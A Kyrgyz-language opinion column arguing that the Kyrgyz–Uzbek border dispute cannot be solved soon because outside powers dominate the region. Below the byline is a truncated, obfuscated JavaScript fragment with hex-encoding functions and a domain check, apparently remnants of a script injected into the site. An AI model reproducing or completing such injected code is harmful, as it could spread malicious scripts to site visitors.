Menu

Калдарбек Шерматов: “Өзбек түйүнүн кантип чечсе болот?”

Бөлүшүү:

Эң оболу Борбордук Азиянын аймагындагы мамлекеттер бири-бирисиз канаты сынган куштай экендигине көзү гана жетпестен. Аны түшүнүүнү жүрөгүнө өткөрүүсү зарылдай.Эгерде мына ушул нукта анча-мынча эле жылыш болгондо, бир катар ташпиштердин музу эрип, кыйынчылык менен болсо да  өзүнөн-өзү бир чекеден  чечилип кирмек. Мында башкы көңүл өз ара түшүнүшүүгө жана  эки тараптын тең кызыкчылыгы корголгон кызматташууга бурулушу  керек.

Ооба, оболу демилитация менен демаркациялоону соңуна чыгаруу абзел.   Бирок  иттин өлүгү кудум ушул жерде көмүлүп жаткандай. Эксперт Саламат Аламановдун пикири боюнча өзбек тарап менен бул ишти соңуна чыгарууга шарттар бардай. Анткени, тээ союз кезинде эле андай иштер жүрүп, 1955- жылы жана 1989-жылдары бир катар жылыштар болгон. Бүгүн кудум ошол тажрыйбага кайрылса болчудай. Ал эми оң натыйжа бербеген күбөнаамалардын жанын кыйнабай эле, четке сүрүп салса неге болбосун. Ымалага,муназага келсе болот. Болгону өлкө башчыларынын саясий эрки гана талап кылынып жатат.

Бирок бүгүнкү кырдаалга таасын көз кырыбызды салсак, Аламановдун пикири суу деле кечпей калышы мүмкүн. Ошо сымал чек арадагы чыр-чатак дагы көпкө чейин эчен башты оорутуп, эчен түйшүктүү жаратышын эч ким четке сүрүп койо албайт. Анткени, бул саясий жана башка  оюндардын үстүндө дүйнөлүк дөө-шаалардын менминсинген оюнчулары отурушат. Колдорунда жалаң көзүр карталары жана колго чаап турчу чыбыктары бар.

Алар чырларды кээсин утурумдукка чала була көнүмүш болушат да, убакыт өтүп кези келгенде кайра дем салып тирилтип чаңды сапырта берет. Бир сөз менен  жагдайды качыра койбой  чыбык менен кууп ойунга салат.Ошо сымал кандай гана күчтүү, абройлуу президент болбосун, туруштук  бералбайт. Бул факт.

Ал эми күчкө салып чечип салам деген акылсыздык жана апендичилик. Бул маселени чечүүнүн ордуна кайра тереңдетет. Жанагы ОДБК дегени ачык эле айталы эчтемкени чечпейт. Бул жөн эле өзүн-өзү алдоо.

Жогоруда айткандай, көйгөйдү “каршылашып” жаткан эки тарап гана ийри отуруп, түз кеңешип чечиши мүмкүн. Сырткы күч же ортомчулар мында деле артыкбаш немедей экенин эске сала кетели. Кечээ Аксыда оппозициялык күчтөрдүн  Путинге кайрылуу жолдогону орунсуз да, тузсуз шорподой эле болуп калганын моюнга алганыбыз оң. Анткени, Путин деле сопсонун түшүнөт жана убададан башка  эчтемкени бере да албайт. Ал деле чоң оюндун туткуну.

Дагы бир жолу бар. Кечээ эле коопсуздук боюнча вице-премьер деген кызмат бар болчу. Ойлонушпай эле көчүктөрүн ары бир тебишти.Бүгүн баштарын мыкчып олтургандар да кудум ошол кечээ аны тепкендер экенин  көрүп эле турабыз.

Бул маселедеги эң эле чечилгис түйүнү. Борбордук Азия мамлекеттеринин президенттери жанагы дөө шаа оюнчулардын оюн талаасынан чыга албай көз каранды болгондугунда кудум ушунун айынан тигишинен да, жамаачысынан да жыртылып, сөгүлүп атат ар кандай иш. Экинчиден, Бүткүл дүйнөлүк банк жана башка эл аралык институттар бар каражат менен багып турган. Жөн эле бере берсе гана, бергендин алганы бар…

Демек, өзбек тарап жалгыз эмес жалаабыз деп турса, кыргыз бийлиги деле ошонун тегеринде чайдай демделип, казанда дымдама болуп жатканы  жашыруун эмес.

Унгар тоонун жең ичинен берилип кетиши да жөн эле катардагы бир көрүнүш эмес. Дөө шаалардын кєөзөмөлүндөгү соодалашуу эбак эле болуп, кандайдыр бир кызыкчылыктардын кулагы кесилгени эми гана узун элдин учуна угулуп жатат сыягы. Али уккандан укпаганыбыз көптөй.

Карабайсыңарбы, өзбектер Сары-Булак участкасын басып алышса, кыргыз бийлиги  Чала-Сарт айылы (кайдыгерликтин айынан жана ачкөздүктүн айынан 1991-жылдан бери өзбектин жери )деп атайылап бурмалап расмий айтып жатканы нени каңкуулайт. Көрсө кептин алдында кеп бар тура… Алигиче өзбектер кандайдыр бир билдирүү жасашкан жок. Кала берсе кыргыз ТИМдин нотасына жооп жазышып, эчтемкени деле айтпаганында да кеп бар. Анткени, өз ара тымызын сүйлөшүү жүргөн жана ушундай бир кысымга шылтоолоп чыбык урулган бүтүмдү жүзөгө ашырып алуу планы ишетип чыккан бирок эл деген эл да. Бийликке муш болгон да ошол. Демек, чиеленип калган түйүндү жакын аралыкта эч ким чечеда албайт.Дарт өнөкөткө айланып гана баратат.

 

Калдарбек Койлубайтегин, журналист

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 40 − = 30

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: